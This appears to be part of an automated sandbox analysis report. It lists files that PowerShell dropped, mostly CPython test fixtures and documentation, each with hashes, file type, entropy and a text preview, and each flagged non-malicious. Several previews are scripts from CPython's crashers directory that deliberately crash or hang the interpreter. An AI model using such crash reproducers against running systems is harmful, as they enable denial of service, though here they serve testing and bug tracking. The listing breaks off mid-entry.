                                                                                                                                                                                                                      SHA1:2FAD35371F8340E9108103062B736CD6D6C63A0C
                                                                                                                                                                                                                      SHA-256:08255F32EEA017D306E286D9E6DB090A05D26F0088719B122209819B6F73396D
                                                                                                                                                                                                                      SHA-512:9559CF872E87067F4B216939263DCF6EBEF96C64BBEE1F5C25774A9CA7934BAC6040D9888512D4F794570514B3BF5D28600AFB434B291B6A3F77C03EFC3DF5E4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.$)C.!]. .FD@L=c.(Python).@:. .9h?l1b. .=10m., .0-7BGQ. .GA7N1W7!9V. .>p>n@T4O4Y.. .FD@L=c@:...H?@2@{@N. .0m<vAX. .5%@LEM. .18A6?M. .0#4\GOAv88. .H?@2@{@N. .04C<AvGbGA7N1W7!9V@;...Av?xGU4O4Y.. .FD@L=c@G. .?l>F.(.iPd:.).GQ. .9.9}0z. .5?@{. .E8@LGN., .1W8.0m. .@NEMGA8.FC...H/0f@:. .FD@L=c@;. .=:E)83FC0z. .?)7/. .:P>_?!<-?M. .4k:N:P@G. .GC7'F{?!<-@G. .:|8%...>VGC8.DI@L<G. .039_@;. .GR. .<v. .@V4B. .@L;s@{@N. .>p>n7N. .885i>nA]4O4Y.....!YC90!3!.: .3/>F6s. .>1.~ .E-.! .1]>x@L. .@|4O4Y.. .1W710E. .4Y...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):478
                                                                                                                                                                                                                      Entropy (8bit):5.618486656871164
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:5c5pseplXsxJGmBx7yhfUj8rU0yWXeDsbON8monhH:5cXtplXsnGm3yfU4ZXysbONoH
                                                                                                                                                                                                                      MD5:4AD57DC71CD0710481E757484C6D1197
                                                                                                                                                                                                                      SHA1:44CFFB5117F62E0697F27F9D2537DE3108749DF4
                                                                                                                                                                                                                      SHA-256:175E984C0C7BD073F037B0AAA6DF4D8AADACB6F1B8898484A567B5E70F5A5837
                                                                                                                                                                                                                      SHA-512:4A2F934F6F907CD2B3C70E3614684460F253E29CE554A418CDC53555FEB26252607283D4D5C27221CC8205D002FEBF4C73B49D5AC0C6B7376E5DADE72E9FC9EE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.... .........!! ....... ...... .. .. .. ....... . . . . ... ... .. ! ! !....... ....._. .. ... .. .... ...... .. . . . . ... .. .... ........... ! ! ... ... ... .... .... ........ .... .. .........!! .... ..*..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:OpenPGP Public Key
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):346
                                                                                                                                                                                                                      Entropy (8bit):5.7360500374334835
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:4UvteGGEF7xJNL+kdsrr2tZ4JnHPA5Xo5toQK7HaNX82LMTR3lGfYlU:0GGEZxJNKJrr2tZ4JHI5XuVKraNXB4T+
                                                                                                                                                                                                                      MD5:9257C9029DFF82F8186D9C10FE0CF739
                                                                                                                                                                                                                      SHA1:95277CB49DB529F564C88B4E484B137E8FBE0D77
                                                                                                                                                                                                                      SHA-256:972DE213C408D10C381F44FEC786787844141C7590506E001452E8E25F262BE8
                                                                                                                                                                                                                      SHA-512:BF866924A2A5DC4736A221F6C506B2D48F04366D5F19E1E2F1A391F17FDF9A29C4B97D53CD2521C05DE86D3D11D77467F981512375EB1D94085C9504EE22CB9A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...w.b.a .\....a.......s!! .g..U....... .....z... .w.. ... ... ...<.w..w.s . . . . .... .e.b.. .;.z ! ! !.A..A..a.a.a .A.A.A.i.A_.A .. ....z .a.w ..i.. ...a.z...z .;.z . . . . ...... ... .....z .g.b.I....a........z ! ! .<.w.. .;.w.. .i.. ...w...w .<.w...z .i...z...a.A. ......z .. .g.b.I......i.z!! .....s. .b.b*..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1094
                                                                                                                                                                                                                      Entropy (8bit):5.10143839860704
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tFIJ+UfttUAPJxd0b/Gl5NFW4sBF+/LOiqM33E6+F6T:tFIwl0JxdKGXu45KiqMkLgT
                                                                                                                                                                                                                      MD5:CC34BCC252D8014250B2FBC0A7880EAD
                                                                                                                                                                                                                      SHA1:89A79425E089C311137ADCDCF0A11DFA9D8A4E58
                                                                                                                                                                                                                      SHA-256:A6BBFB8ECB911D13581F7713391F8C0CEEA1EDD41537FDB300BBB4D62DD72E9B
                                                                                                                                                                                                                      SHA-512:C6FB4A793870993A9F1310CE59697397E5334DBB92031AB49A3ECC33C55E84737E626E815754C5DDBE7835B15D3817BF07D2B4C80EA5FD956792B4DB96C18C2F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python .....1990 ................... Guido van Rossum ...............ABC...............ABC .............................Guido .......................... BBS .............. ............ Guido .......Python....................... Python ...............................................................................................Python ...................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with LF, NEL line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):760
                                                                                                                                                                                                                      Entropy (8bit):5.719213501440797
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:tFnbki42JIoqumiTgdFy9roLB75miPSrZMOSUeomL4in0roSx7PHXKB+xASinL3r:tFn3JOugDI0RwWJb7n8hnxASinby8npn
                                                                                                                                                                                                                      MD5:0BE1C668CE944B8CBBF4D55D327447CD
                                                                                                                                                                                                                      SHA1:AC4758B677D7F897F5FB8C2CEDB2966E3D820C4E
                                                                                                                                                                                                                      SHA-256:73CDABEBFB92B4EAF6B8AF8442953DA1041FA8141A0513279B8DF215879D4246
                                                                                                                                                                                                                      SHA-512:187359F20B1744DD15FF7696046CF5E67B998BF485087C4945C33F1278C8B2527CB5EBE34E5A6E45818D1711E61C6F5A10793592C4BF207D6E774F6C713219FD
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python ..J....A1990 .N......J.n..........B..J..... Guido van Rossum .....p..v...O...~...O....uABC.v..J....Q...............AABC ....p....I.......K...............B........AGuido ......p.I..v...O...~...O.....J.....J.n...A.p.. BBS ......R...f.B..g.u.....e.B .p.C.\...v..t.@....... Guido ..........uPython.v............B........w.i....... Python ......v..A.u.V...v...v..u.K.....e..v.......W..d._...u..........B.......X.N...v.g.n........[.U...........D....F.X..@.\......v.f.........................APython ................H.......................B........@.\..............A.K.v..@.\..g.....W...[.............A........ Python ..|...V.[....B..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1144
                                                                                                                                                                                                                      Entropy (8bit):5.154012543777603
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tFIJ+UfttUAPJxd0b/Gl5NFW4sBF+/LOiqM33E6+F6ZCYG:tFIwl0JxdKGXu45KiqMkLgZ9G
                                                                                                                                                                                                                      MD5:856E0CEBAE566258F572E27AEDCBF34D
                                                                                                                                                                                                                      SHA1:9C4E3BAFCC4A0C146D4BF21DD126484BB454E789
                                                                                                                                                                                                                      SHA-256:21CB011018B58C87F2C824E08085D24F9379244BCDE6FBB6B46DA2F6431540C7
                                                                                                                                                                                                                      SHA-512:21E996C6470367D7A74E6CF96B0105DDD93FDA0C20FA4053842C3504F582C83688CAF04FB64F7FA0E28378D894D29A7B1A39B8BFA7869F710FCC804A6231B3B8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python .....1990 ................... Guido van Rossum ...............ABC...............ABC .............................Guido .......................... BBS .............. ............ Guido .......Python....................... Python ...............................................................................................Python ...................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with LF, NEL line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):789
                                                                                                                                                                                                                      Entropy (8bit):5.775612697346342
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:tFn3JOugDI0RwWJb7n8hnxASinby8npnSx:tFn3rgDI0RwCn8hnxASin5pnSx
                                                                                                                                                                                                                      MD5:AE2A41DEDDF5D7E60B4F75455E30DDDC
                                                                                                                                                                                                                      SHA1:4D071FF0AAC3C3CD15D476D41F0618FA4E3275C6
                                                                                                                                                                                                                      SHA-256:0BEE94BA2D980EAC331C16AF1F6EA7583260DAD3E592E5A263209AAB26C821A9
                                                                                                                                                                                                                      SHA-512:74EEE4187450D353F1ED32BD2B00B7693DF4688F4F94F588D9E9E26909529006295D4013874B363A0A64DC1F36001292B0BBBC682042410297D26174D4C03D3E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Python ..J....A1990 .N......J.n..........B..J..... Guido van Rossum .....p..v...O...~...O....uABC.v..J....Q...............AABC ....p....I.......K...............B........AGuido ......p.I..v...O...~...O.....J.....J.n...A.p.. BBS ......R...f.B..g.u.....e.B .p.C.\...v..t.@....... Guido ..........uPython.v............B........w.i....... Python ......v..A.u.V...v...v..u.K.....e..v.......W..d._...u..........B.......X.N...v.g.n........[.U...........D....F.X..@.\......v.f.........................APython ................H.......................B........@.\..............A.K.v..@.\..g.....W...[.............A........ Python ..|...V.[....B...m.. .. .g.L.K.y .... .......
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):146933
                                                                                                                                                                                                                      Entropy (8bit):5.251241375262966
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:QOmAtTyu7Yc9mkttGPo8JT1czYXbDq2RDq2vNJekEXmY0vP8rvOhsmXueWmzRZN0:ymWmlNcMvGzxHE
                                                                                                                                                                                                                      MD5:D476524154884672EE35273E10F3D330
                                                                                                                                                                                                                      SHA1:4F7C034CCC288C8A2D1C255978D128B15D7A6AD1
                                                                                                                                                                                                                      SHA-256:B390181D55FD2A6C9398951F968F4AD6DE6FEE6F8C9779A27D80727CF58FE4AB
                                                                                                                                                                                                                      SHA-512:95F03179376EDD25E5C0A3577CAC444CDF49EB5DC646A0C0A1BE151B87EB29FD69C380C53642D8DA723C6941D8CDC63BE1540CCA13AED817CE7014CCA985C5D4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:/*[clinic input]..output preset block..[clinic start generated code]*/../*[clinic end generated code: output=da39a3ee5e6b4b0d input=3c81ac2402d06a8b]*/..../*[clinic input]..class Test "TestObj *" "TestType"..[clinic start generated code]*/../*[clinic end generated code: output=da39a3ee5e6b4b0d input=fc7e50384d12b83f]*/..../*[clinic input]..test_object_converter.... a: object.. b: object(converter="PyUnicode_FSConverter").. c: object(subclass_of="&PyUnicode_Type").. d: object(type="PyUnicode_Object *").. /....[clinic start generated code]*/....PyDoc_STRVAR(test_object_converter__doc__,.."test_object_converter($module, a, b, c, d, /)\n".."--\n".."\n");....#define TEST_OBJECT_CONVERTER_METHODDEF \.. {"test_object_converter", _PyCFunction_CAST(test_object_converter), METH_FASTCALL, test_object_converter__doc__},....static PyObject *..test_object_converter_impl(PyObject *module, PyObject *a, PyObject *b,.. PyObject *c, PyUnicode_Object *d);....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):147100
                                                                                                                                                                                                                      Entropy (8bit):4.569237773706076
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:O+SjSdA+evWsmSLHIvMSKLufkonr/jn/tUlilVjgBjx5oWAAdD63E+rWivXdfHDx:Of301ZUJmjx
                                                                                                                                                                                                                      MD5:5C5DC8336C8817349C03F69CB46DB986
                                                                                                                                                                                                                      SHA1:2D2F8BA00B09F251D05CD0C012172FB0C82472E1
                                                                                                                                                                                                                      SHA-256:6B8BF5C224637DADA02A3CD936DD426EB5E27D1CDD6F68DDBA49D392BA0A910E
                                                                                                                                                                                                                      SHA-512:03F11ABAE55D252DD19F7CDD03F4C6FE3AD6FB1D08593B2583E3CD991018D0056F95A410662E913C01EB7FEECA26AEB4617DF861542B40D4676FC02A9CBE5E53
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:-- Testcases for functions in cmath...--..-- Each line takes the form:..--..-- <testid> <function> <input_value> -> <output_value> <flags>..--..-- where:..--..-- <testid> is a short name identifying the test,..--..-- <function> is the function to be tested (exp, cos, asinh, ...),..--..-- <input_value> is a pair of floats separated by whitespace..-- representing real and imaginary parts of a complex number, and..--..-- <output_value> is the expected (ideal) output value, again..-- represented as a pair of floats...--..-- <flags> is a list of the floating-point flags required by C99..--..-- The possible flags are:..--..-- divide-by-zero : raised when a finite input gives a..-- mathematically infinite result...--..-- overflow : raised when a finite input gives a finite result whose..-- real or imaginary part is too large to fit in the usual range..-- of an IEEE 754 double...--..-- invalid : raised for invalid inputs...--..-- ignore-real-sign : indicat
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):70
                                                                                                                                                                                                                      Entropy (8bit):4.580659759889138
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:SANFDK1rRdXDDcvqnv3HXv:SyDKRDDdn
                                                                                                                                                                                                                      MD5:DB368359FFB0F7A1A43FA3A1928F7D48
                                                                                                                                                                                                                      SHA1:D89A75E4A42791B43088290B89CB523C6F549897
                                                                                                                                                                                                                      SHA-256:88F269B6CCF20A48ABE5C5992C141E1977BC488CB985F4CAC81D055F7ADF51E2
                                                                                                                                                                                                                      SHA-512:7BC8EEA0B79F78ACBA61AD4A5643F36F53E18AD8353DC9A76E71C05329DBCCBFBACF1091C71A7CFA39288E133AEEC4E8BCFBB475A9E8E25FE1FAAC30367B2242
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Also used by idlelib.test_idle.test_config...[Foo Bar]..foo=newbar..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20009
                                                                                                                                                                                                                      Entropy (8bit):4.87368081545266
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:h1Gckx8tE+xgEoeTpbRtM40ExbBhtWC+ZXEV0zeBEFvGg1Zqlm:PG9XevTntiEThAZ69sclm
                                                                                                                                                                                                                      MD5:A7ED4445BCF8A041FABABF54C834D49D
                                                                                                                                                                                                                      SHA1:962AD1E8E4D4C1BCA84BEA111BE498FD33412CA2
                                                                                                                                                                                                                      SHA-256:89726539BD447120491A86038F273C313B4625BDA9E76E4D2548877846207E04
                                                                                                                                                                                                                      SHA-512:7317390662E68C49802996FB8F866B1475A53D888E38C1BA945A01A554DFE67B227990C983B4A5B2BEC30D8ADE9ED684B186FA11BCCE27DDF00B4BFC6999F1D0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# This is the main Samba configuration file. You should read the..# smb.conf(5) manual page in order to understand the options listed..# here. Samba has a huge number of configurable options (perhaps too..# many!) most of which are not shown in this example..#..# Any line which starts with a ; (semi-colon) or a # (hash) ..# is a comment and is ignored. In this example we will use a #..# for commentry and a ; for parts of the config file that you..# may wish to enable..#..# NOTE: Whenever you modify this file you should run the command #"testparm" # to check that you have not made any basic syntactic #errors. ..#..#======================= Global Settings =====================================..[global]....# 1. Server Naming Options:..# workgroup = NT-Domain-Name or Workgroup-Name.. .. workgroup = MDKGROUP....# netbios name is the name you will see in "Network Neighbourhood",..# but defaults to your hostname....; netbios name = <name_of_this_server>....# server string is the equivalen
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1656
                                                                                                                                                                                                                      Entropy (8bit):4.464671079040967
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:KgbKQlwpNKteRjfIO2z/z/CVd7Qf08Ukr51zICx1biVJcHlF0EzbJEn:PKQVtmUqBQfFUkzICx1urgT1zbJEn
                                                                                                                                                                                                                      MD5:4C48DBEDBC92CB19AC2CAFEA95351169
                                                                                                                                                                                                                      SHA1:F5EDA97EA7A42E4F05D8C841E449AE1ACF95DA0A
                                                                                                                                                                                                                      SHA-256:840B4F08958FE53030983CD4B9C1E060BC68697EA7170BD3A844778DAC49F8D3
                                                                                                                                                                                                                      SHA-512:68D1048BDF0A696FC49D125FEA2351ED2065CAE8228F96ADCDA2FC4688738A71A7B3C0B8697E7F86C92A9BAFDA9DA1E928DD1AB5267FC150E69A80FA4C19595A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview: # INI with as many tricky parts as possible.. # Most of them could not be used before 3.2.. .. # This will be parsed with the following options.. # delimiters = {'='}.. # comment_prefixes = {'#'}.. # allow_no_value = True....[DEFAULT]..go = %(interpolate)s....[strange].. values = that are indented # and end with hash comments.. other = that do continue.. in # and still have.. other # comments mixed.. lines # with the values............[corruption].. value = that is ...... actually still here...... and holds all these weird newlines...... # but not for the lines that are comments.. nor the indentation.... another value = # empty string.. yet another # None!.... [yeah, sections can be indented as well].. and that does not mean = anything.. are they subsections = False.. if you want subsections = use XML.. lets use some Unicode = ....... [another one!].. even if values are indented like this = seriously..yes, this stil
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1049
                                                                                                                                                                                                                      Entropy (8bit):4.410991268329601
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:X0vVA299zX/jV9TBpprqVx23naIzAnI5V7TZFVdy/6q+h6:Xa/brZ9TTpY23hCcTdL0
                                                                                                                                                                                                                      MD5:CC05D44AD4B6244A3884A24BF4369BB2
                                                                                                                                                                                                                      SHA1:BE765A64130C01F60B18722601D8CEA7DEDA3871
                                                                                                                                                                                                                      SHA-256:25C9405D5811689A318ADEACA132E06A6A352C1FFA3C65E358F96D94A1C35533
                                                                                                                                                                                                                      SHA-512:FE49EEC8A10BADCE7E35A8565501B0E9627611FFA179F43DABE4F7D966DD9F9807F99377B5EA25B4082FAA2866D6EE0C1A90B58790E3B6092F85947D96A14303
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:This directory only contains tests for outstanding bugs that cause the..interpreter to segfault. Ideally this directory should always be empty, but..sometimes it may not be easy to fix the underlying cause and the bug is deemed..too obscure to invest the effort.....Each test should fail when run from the command line:....../python Lib/test/crashers/weakref_in_del.py....Put as much info into a docstring or comments to help determine the cause of the..failure, as well as a bugs.python.org issue number if it exists. Particularly..note if the cause is system or environment dependent and what the variables are.....Once the crash is fixed, the test case should be moved into an appropriate test..(even if it was originally from the test suite). This ensures the regression..doesn't happen again. And if it does, it should be easier to track down.....Also see Lib/test_crashers.py which exercises the crashers in this directory...In particular, make sure to add any new infinite loop crashers to
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):647
                                                                                                                                                                                                                      Entropy (8bit):4.634577517286021
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:ka/lKZJebyR3053cLEBPXDbFtTc50wXpA2ebNRFiqjutssRi9OzP:ka/AJL053cwBPTbTTchZJmZiqudP
                                                                                                                                                                                                                      MD5:434F8A1AB0697B40ABA0F0D43F3C7449
                                                                                                                                                                                                                      SHA1:C4C74C6DCCC615997C7CC654B6D127EDE965A128
                                                                                                                                                                                                                      SHA-256:B9769EDBDD912EE8E3BD4D5806C9A3919A82E5E7EA311435ED396D77518E8431
                                                                                                                                                                                                                      SHA-512:3DB694EF7E1BFEA9F6A7B2FF456F9A19756FF391A573A32051ABA261833F3CA7A698CEFEE608C19B1CA254D28A2C2533BE716FE5AFBE5690D1E110CF0378A6C6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..Broken bytecode objects can easily crash the interpreter.....This is not going to be fixed. It is generally agreed that there is no..point in writing a bytecode verifier and putting it in CPython just for..this. Moreover, a verifier is bound to accept only a subset of all safe..bytecodes, so it could lead to unnecessary breakage.....For security purposes, "restricted" interpreters are not going to let..the user build or load random bytecodes anyway. Otherwise, this is a.."won't fix" case....."""....import types....co = types.CodeType(0, 0, 0, 0, 0, 0, b'\x04\x00\x71\x00',.. (), (), (), '', '', 1, b'')..exec(co)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1124
                                                                                                                                                                                                                      Entropy (8bit):4.712392284742513
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:Vk37wE3kaIR80QGI1yLFqE3feHcIJmQ4u4t:Vk33TsjdVvwNhu
                                                                                                                                                                                                                      MD5:521E8297012873C2F36E58303F52A0F1
                                                                                                                                                                                                                      SHA1:EC8284D6C89A05400E188C631D8304EAA7B9505F
                                                                                                                                                                                                                      SHA-256:3975BF2865308FF9AE2C894C3A88B38F0613E63925886945C58FAB4EA2509861
                                                                                                                                                                                                                      SHA-512:39C8C2015C9BF87E18850CF7BE7775E35A1B0B3135ECBF2626361568B2F4B74E9B514F10E9A8EE4F6B9EBD126DF42918986F8790EACDDDB12B33B59EFCC8C595
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..gc.get_referrers() can be used to see objects before they are fully built.....Note that this is only an example. There are many ways to crash Python..by using gc.get_referrers(), as well as many extension modules (even..when they are using perfectly documented patterns to build objects).....Identifying and removing all places that expose to the GC a..partially-built object is a long-term project. A patch was proposed on..SF specifically for this example but I consider fixing just this single..example a bit pointless (#1517042).....A fix would include a whole-scale code review, possibly with an API..change to decouple object creation and GC registration, and according..fixes to the documentation for extension module writers. It's unlikely..to happen, though. So this is currently classified as.."gc.get_referrers() is dangerous, use only for debugging"..."""....import gc......def g():.. marker = object().. yield marker.. # now the marker is in the tuple being constructed
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):669
                                                                                                                                                                                                                      Entropy (8bit):5.407543494007139
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:g1eRSMKnyRtVbFVqFsvRdf+9T13MIW/jCYB2adS3Ax:g8RrPRIiRN+9tWwadS3s
                                                                                                                                                                                                                      MD5:6694922A1B9526FBD880E9B2D2BCE144
                                                                                                                                                                                                                      SHA1:C543FD7AD10F88085AAFE4BB66BADD82EB30070A
                                                                                                                                                                                                                      SHA-256:2962F4B419D537CD874C00B13CD426D73DB6838C248F4661BF5FE79238533DAB
                                                                                                                                                                                                                      SHA-512:4A74E340CFBBDC2027489499037162623CDF95E9DBB77DB7C77020B32C5A2AE02CC2FF4C78DEBD5E83C675E3CC1FBDA9D1BDDDE6402549255EA75C7067E57386
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..# This was taken from https://bugs.python.org/issue1541697..# It's not technically a crasher. It may not even truly be infinite,..# however, I haven't waited a long time to see the result. It takes..# 100% of CPU while running this and should be fixed.....import re..starttag = re.compile(r'<[a-zA-Z][-_.:a-zA-Z0-9]*\s*('.. r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*'.. r'(\'[^\']*\'|"[^"]*"|[-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~@]'.. r'[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*(?=[\s>/<])))?'.. r')*\s*/?\s*(?=[<>])')....if __name__ == '__main__':.. foo = '<table cellspacing="0" cellpadding="0" style="border-collapse'.. starttag.match(foo)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):784
                                                                                                                                                                                                                      Entropy (8bit):4.714343549272052
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:fcedU53Vc2LCLcyhQyD+/tYNqysap9fYU/xogwE3Z0YxyMdVNs9vq6daUGPHgXWM:f32BVc2LCLcypAKJYUfWYx1aSdgmM
                                                                                                                                                                                                                      MD5:8587E4D7B7A2BC9DF2ED123F0B833E0F
                                                                                                                                                                                                                      SHA1:B527C818D60725B65E10901CD44CF4A1848B967B
                                                                                                                                                                                                                      SHA-256:229607665E3ED88042B300821FF3ECBE1053356D791279252F978F226AF495E8
                                                                                                                                                                                                                      SHA-512:F8EF3A91C4320CC573E466D99687D649C7B7F4C0F9AF72EE8CC8E235780A23E3D91C73AE9573480D5844E6D7B7F6F538E19CEF5BCEEF0241571497E0275BB405
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..# The cycle GC collector can be executed when any GC-tracked object is..# allocated, e.g. during a call to PyList_New(), PyDict_New(), .....# Moreover, it can invoke arbitrary Python code via a weakref callback...# This means that there are many places in the source where an arbitrary..# mutation could unexpectedly occur.....# The example below shows list_slice() not expecting the call to..# PyList_New to mutate the input list. (Of course there are many..# more examples like this one.)......import weakref....class A(object):.. pass....def callback(x):.. del lst[:]......keepalive = []....for i in range(100):.. lst = [str(i)].. a = A().. a.cycle = a.. keepalive.append(weakref.ref(a, callback)).. del a.. while lst:.. keepalive.append(lst[:])..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):373
                                                                                                                                                                                                                      Entropy (8bit):4.950728369840822
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:HWaHoXzBGF5RVcAgsRyGFhu9xz3JtNFXBD8DHX3YK9MxeihAjaj2n:HwXoFSUAG23gH1G2ain
                                                                                                                                                                                                                      MD5:7930FC429817431AFA73E1B62373580D
                                                                                                                                                                                                                      SHA1:6DB19B16F85DFCEE4B2D4833A0AD7F342FD9CDBE
                                                                                                                                                                                                                      SHA-256:925C1F3F5C2E2424EBD136863D668366E99F4FEE837F93CF4F48B6E020F95D3C
                                                                                                                                                                                                                      SHA-512:F8A4E7E2ACA1D1E7C4755BE52274627A3741CAE175CCB8E07CD0382578FB2748E4BBDAA6EA8BF0182C23F77393D670DD1E4001D98D468623F28D8546C725CB4D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#!/usr/bin/env python3....# No bug report AFAIK, mail on python-dev on 2006-01-10....# This is a "won't fix" case. It is known that setting a high enough..# recursion limit crashes by overflowing the stack. Unless this is..# redesigned somehow, it won't go away.....import sys....sys.setrecursionlimit(1 << 30)..f = lambda f:f(f)....if __name__ == '__main__':.. f(f)..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):403
                                                                                                                                                                                                                      Entropy (8bit):4.44333545003961
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:G/XUafJ8KTgvyK7MbOUM/wALyupVy9rZi:dafuae7Mbs/wC1pI9k
                                                                                                                                                                                                                      MD5:8A6813EFF25907E1E90A4CDECD364B6C
                                                                                                                                                                                                                      SHA1:5FB050DBDE859F341A21B16DA8B9E789391D1689
